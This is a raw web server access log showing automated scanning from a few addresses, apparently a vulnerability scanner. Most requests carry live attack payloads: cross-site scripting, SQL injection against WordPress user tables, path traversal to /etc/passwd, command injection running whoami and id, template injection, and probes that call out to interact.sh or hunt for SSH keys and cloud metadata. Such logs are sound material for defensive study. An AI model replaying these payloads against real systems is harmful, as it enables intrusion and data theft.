107.189.31.184 - - [17/Jun/2023:04:57:06 +0530] "GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:04:57:06 +0530] "GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:04:57:21 +0530] "GET /jolokia HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:04:57:21 +0530] "GET /jolokia HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:04:57:23 +0530] "GET /actuator/jolokia HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:04:57:23 +0530] "GET /actuator/jolokia HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:05:01:44 +0530] "GET /password-page/ovf/account-credentials-ovf HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:05:01:45 +0530] "GET /password-page/ovf/account-credentials-ovf HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:05:04:04 +0530] "GET /wpdmpro/list-packages/?order=asc&orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:05:04:05 +0530] "GET /wpdmpro/list-packages/?order=asc&orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:05:04:10 +0530] "GET /account/register HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:05:04:11 +0530] "GET /account/register HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:05:06:33 +0530] "GET /?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500&rest_route=/wc/store/products/collection-data HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:06:34 +0530] "GET /?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500&rest_route=/wc/store/products/collection-data HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:08:41 +0530] "GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:05:08:42 +0530] "GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:05:08:44 +0530] "GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:05:08:45 +0530] "GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:05:08:47 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:05:08:48 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1" 404 1056
198.98.57.217 - - [17/Jun/2023:05:08:48 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:05:08:50 +0530] "GET /objects/nuclei.txt HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:05:08:51 +0530] "GET /objects/nuclei.txt HTTP/1.1" 404 1030
205.185.115.70 - - [17/Jun/2023:05:11:01 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:05:12:18 +0530] "GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:05:12:18 +0530] "GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1" 404 1070
198.144.159.126 - - [17/Jun/2023:05:13:36 +0530] "CONNECT cn.bing.com:443 HTTP/1.1" 400 -
185.180.143.6 - - [17/Jun/2023:05:14:44 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:15:16 +0530] "POST /data/login HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:05:15:17 +0530] "POST /data/login HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:05:17:15 +0530] "GET /admin/?id=-6%27%20union%20select%201,md5('999999999'),3,4,5,6,7,8,9,10,11--+&page=user/manage_user HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:05:17:16 +0530] "GET /admin/?id=-6%27%20union%20select%201,md5('999999999'),3,4,5,6,7,8,9,10,11--+&page=user/manage_user HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:05:21:43 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:05:21:44 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:05:22:33 +0530] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:05:22:34 +0530] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:05:23:24 +0530] "GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1104
107.189.31.184 - - [17/Jun/2023:05:23:24 +0530] "GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1104
107.189.31.184 - - [17/Jun/2023:05:26:45 +0530] "GET /my.ppk HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:05:26:48 +0530] "GET /putty.ppk HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:05:26:48 +0530] "GET /my.ppk HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:05:26:51 +0530] "GET /103.145.51.236:8080.ppk HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:05:26:51 +0530] "GET /putty.ppk HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:05:26:54 +0530] "GET /.ssh/putty.ppk HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:05:26:54 +0530] "GET /103.145.51.74:8080.ppk HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:05:26:57 +0530] "GET /.ssh/103.145.51.236:8080.ppk HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:05:26:57 +0530] "GET /.ssh/putty.ppk HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:05:27:00 +0530] "GET /.ssh/103.145.51.74:8080.ppk HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:05:27:00 +0530] "GET /.putty/my.ppk HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:05:27:03 +0530] "GET /.putty/my.ppk HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:05:27:03 +0530] "GET /.putty/putty.ppk HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:05:27:06 +0530] "GET /.putty/103.145.51.236:8080.ppk HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:05:27:06 +0530] "GET /.putty/putty.ppk HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:05:27:09 +0530] "GET /.putty/103.145.51.74:8080.ppk HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:05:27:29 +0530] "POST /filemanager/upload.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:05:27:30 +0530] "POST /filemanager/upload.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:05:29:03 +0530] "GET /libs/granite/offloading/content/view.html HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:05:29:04 +0530] "GET /libs/granite/offloading/content/view.html HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:05:30:43 +0530] "GET /install HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:05:30:43 +0530] "GET /install HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:05:32:59 +0530] "GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:05:33:00 +0530] "GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:05:34:34 +0530] "GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:05:34:35 +0530] "GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:05:35:12 +0530] "GET /static/../../../a/../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:05:35:12 +0530] "GET /static/../../../a/../../../../etc/passwd HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:05:36:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:05:37:34 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:05:37:34 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:05:37:34 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:05:37:34 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:05:37:39 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:05:37:39 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:05:37:39 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:05:37:39 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:38:18 +0530] "GET /module/?from_url=x&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&module=admin%2Fmodules%2Fmanage HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:05:38:19 +0530] "GET /module/?from_url=x&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&module=admin%2Fmodules%2Fmanage HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:05:38:27 +0530] "GET /hosts HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:05:38:27 +0530] "GET /hosts HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:05:38:37 +0530] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:05:38:38 +0530] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:05:38:39 +0530] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:05:38:40 +0530] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 1024
46.174.191.30 - - [17/Jun/2023:05:39:25 +0530] "GET / HTTP/1.0" 200 11230
107.189.31.184 - - [17/Jun/2023:05:40:37 +0530] "GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:05:40:37 +0530] "GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:05:41:29 +0530] "GET /wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:05:41:29 +0530] "GET /wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:05:44:08 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:05:44:09 +0530] "GET null null" 400 -
87.120.88.58 - - [17/Jun/2023:05:45:49 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:05:46:10 +0530] "GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:05:46:12 +0530] "GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:05:49:15 +0530] "GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:05:49:16 +0530] "GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:05:49:45 +0530] "GET /?address_lat&address_lng&distance=10&lcats%5B%5D&location_search&nearby=off&search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:49:45 +0530] "GET /?address_lat&address_lng&distance=10&lcats%5B%5D&location_search&nearby=off&search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:50:06 +0530] "GET /%5C%5Cinteract.sh/%252e%252e%252f HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:05:50:06 +0530] "GET /%5C%5Cinteract.sh/%252e%252e%252f HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:05:50:19 +0530] "POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:05:50:19 +0530] "POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:05:52:41 +0530] "GET /.remote-sync.json HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:05:52:41 +0530] "GET /.remote-sync.json HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:05:53:53 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:05:53:53 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:05:54:03 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:05:54:03 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:05:54:08 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:05:54:08 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:05:54:13 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:05:54:13 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [17/Jun/2023:05:54:18 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:05:54:18 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:05:54:28 +0530] "POST /action.php HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:05:54:29 +0530] "POST /action.php HTTP/1.1" 404 1014
83.97.73.89 - - [17/Jun/2023:05:55:41 +0530] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 404 1068
83.97.73.89 - - [17/Jun/2023:05:55:44 +0530] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:05:57:37 +0530] "GET /wp-admin/admin-ajax.php?_memberhero_hook=phpinfo&action=memberhero_send_form HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:05:57:37 +0530] "GET /wp-admin/admin-ajax.php?_memberhero_hook=phpinfo&action=memberhero_send_form HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:05:58:25 +0530] "GET /ie50/system/login/SysLoginUser.aspx?Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Login=Error HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:05:58:26 +0530] "GET /ie50/system/login/SysLoginUser.aspx?Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Login=Error HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:05:58:27 +0530] "GET /system/login/SysLoginUser.aspx?Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Login=Error HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:05:58:28 +0530] "GET /system/login/SysLoginUser.aspx?Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Login=Error HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:05:59:21 +0530] "GET /js/elfinder.min.js HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:05:59:22 +0530] "GET /js/elfinder.min.js HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:05:59:24 +0530] "GET /js/elFinder.version.js HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:05:59:24 +0530] "GET /js/elFinder.version.js HTTP/1.1" 404 1038
45.128.232.141 - - [17/Jun/2023:06:01:23 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
83.97.73.89 - - [17/Jun/2023:06:02:26 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:06:02:27 +0530] "GET /includes/mysql2i/mysql2i.func.php HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:06:02:28 +0530] "GET /includes/mysql2i/mysql2i.func.php HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:06:02:29 +0530] "GET /addons/phpmailer/phpmailer.php HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:06:02:30 +0530] "GET /addons/phpmailer/phpmailer.php HTTP/1.1" 404 1054
83.97.73.89 - - [17/Jun/2023:06:05:59 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:06:06:32 +0530] "GET /qvisdvr/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:06:06:33 +0530] "GET /qvisdvr/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:06:06:35 +0530] "GET /cgi-bin/printenv.pl HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:06:06:36 +0530] "GET /cgi-bin/printenv.pl HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:06:07:36 +0530] "GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1114
107.189.31.184 - - [17/Jun/2023:06:07:37 +0530] "GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1114
107.189.31.184 - - [17/Jun/2023:06:07:49 +0530] "GET /caches HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:06:07:50 +0530] "GET /caches HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:06:07:52 +0530] "GET /actuator/caches HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:06:07:52 +0530] "GET /actuator/caches HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:06:08:08 +0530] "GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:06:08:08 +0530] "GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1074
83.97.73.89 - - [17/Jun/2023:06:09:23 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:06:10:10 +0530] "GET /user/login.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:06:10:11 +0530] "GET /user/login.php HTTP/1.1" 404 1022
83.97.73.89 - - [17/Jun/2023:06:10:13 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:06:11:01 +0530] "POST /login.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:11:02 +0530] "POST /login.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:12:30 +0530] "GET /data/plugins_listing HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:06:12:31 +0530] "GET /data/plugins_listing HTTP/1.1" 404 1034
83.97.73.89 - - [17/Jun/2023:06:13:54 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
45.128.232.141 - - [17/Jun/2023:06:15:30 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
83.97.73.89 - - [17/Jun/2023:06:15:39 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
83.97.73.89 - - [17/Jun/2023:06:17:42 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:06:17:44 +0530] "GET /tool/log/c.php?host=2RHotxClJ7mhag8woYzLx5g6RsM&strip_slashes=md5 HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:06:17:45 +0530] "GET /tool/log/c.php?host=2RHotxClJ7mhag8woYzLx5g6RsM&strip_slashes=md5 HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:06:19:09 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:19:09 +0530] "GET null null" 400 -
83.97.73.89 - - [17/Jun/2023:06:19:17 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:06:19:23 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:19:24 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:20:12 +0530] "GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:06:20:12 +0530] "GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:06:21:19 +0530] "GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:06:21:20 +0530] "GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:06:21:39 +0530] "GET /pantheon.upstream.yml HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:06:21:40 +0530] "GET /pantheon.upstream.yml HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:06:23:58 +0530] "GET /dynamic/instance-identity/document HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:06:24:00 +0530] "GET /dynamic/instance-identity/document HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:06:24:01 +0530] "GET /dynamic/instance-identity/document HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:06:24:02 +0530] "GET /dynamic/instance-identity/document HTTP/1.1" 404 1062
83.97.73.89 - - [17/Jun/2023:06:24:25 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:06:24:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:25:07 +0530] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:06:25:07 +0530] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:06:25:27 +0530] "GET /wp-content/plugins/checklist/images/checklist-icon.php?fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:06:25:28 +0530] "GET /wp-content/plugins/checklist/images/checklist-icon.php?fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1102
83.97.73.89 - - [17/Jun/2023:06:26:45 +0530] "GET null null" 400 -
83.97.73.89 - - [17/Jun/2023:06:29:08 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:06:31:54 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:06:31:54 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:06:31:59 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:06:31:59 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:06:32:04 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [17/Jun/2023:06:32:04 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [17/Jun/2023:06:32:09 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:06:32:09 +0530] "-" 400 -
83.97.73.89 - - [17/Jun/2023:06:32:11 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:06:36:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:36:40 +0530] "GET /CMSPages/GetDocLink.ashx?link=https://interact.sh/ HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:06:36:41 +0530] "GET /CMSPages/GetDocLink.ashx?link=https://interact.sh/ HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:06:37:10 +0530] "GET //interact.sh HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:06:37:11 +0530] "GET //interact.sh HTTP/1.1" 404 1018
41.186.73.134 - - [17/Jun/2023:06:37:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:06:37:52 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:06:38:05 +0530] "GET /index.asp HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:38:06 +0530] "GET /index.asp HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:38:49 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:06:38:49 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:06:38:51 +0530] "GET /mongo-express/ HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:06:38:52 +0530] "GET /mongo-express/ HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:06:38:53 +0530] "GET /db/admin/system.users HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:06:38:55 +0530] "GET /db/admin/system.users HTTP/1.1" 404 1036
83.97.73.89 - - [17/Jun/2023:06:39:16 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
